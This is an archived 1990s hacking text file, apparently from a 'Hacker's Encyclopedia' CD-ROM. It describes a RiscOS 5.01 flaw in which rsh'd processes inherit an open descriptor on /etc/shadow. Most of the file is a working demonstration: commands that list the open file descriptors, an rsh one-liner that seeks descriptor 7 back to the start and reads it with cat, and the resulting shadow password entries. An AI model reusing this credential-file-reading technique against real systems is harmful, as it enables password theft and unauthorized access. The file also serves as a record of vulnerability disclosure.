home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / hacking / general / riscos_r.exp < prev    next >
Encoding:
Text File  |  2003-06-11  |  1.2 KB  |  37 lines
  1. When rsh'ing to a RiscOS 5.01 machine, the process being run has a file
  2. descriptor open RO on the shadow password file.  A simple program to
  3. seek it back to 0 and copy will reveal the encrypted passwords to
  4. anyone who can rsh to the machine.
  5.  
  6. suite is a Mips RiscOS 5.01 machine; suede is a Solaris box
  7.  
  8. : suite:4; ls -li /etc/shadow
  9.   4409 -r--------  1 root         4072 Aug 11 08:48 /etc/shadow
  10.  
  11. : suede:21; rsh suite t/openfd
  12.  
  13. 21 Dev (33, 0), ino 2679, type character special
  14. 20 Dev (33, 0), ino 2679, type character special
  15. 8 Dev (255, 255), ino 13566, type FIFO
  16. 7 Dev (33, 0), ino 4409, type regular file      *****
  17. 4 Dev (33, 0), ino 4409, type regular file      *****
  18. 2 Dev (255, 255), ino 13566, type FIFO
  19. 1 Dev (0, 0), ino 0, type Unknown
  20. Numeric type: 0
  21. 0 Dev (0, 0), ino 0, type Unknown
  22. Numeric type: 0
  23.  
  24. (seek0 just seeks its stdin to offset 0)
  25. : suede:21; rsh suite '(t/seek0; cat)</dev/fd/7'
  26. root:oHnoyOuDOnt:9334::::::
  27. setup:*NOLOGIN*:8603::::::
  28. sysadm:*NOLOGIN*:8603::::::
  29. daemon:*NOLOGIN*:8603::::::
  30. bin:*NOLOGIN*:8603::::::
  31. ...
  32.  
  33. I'm curious about the pipes as well; what are they to?  I think the "unknown"
  34. file descriptors are sockets; fstat doesn't seem to cope with them.
  35.  
  36.  
  37.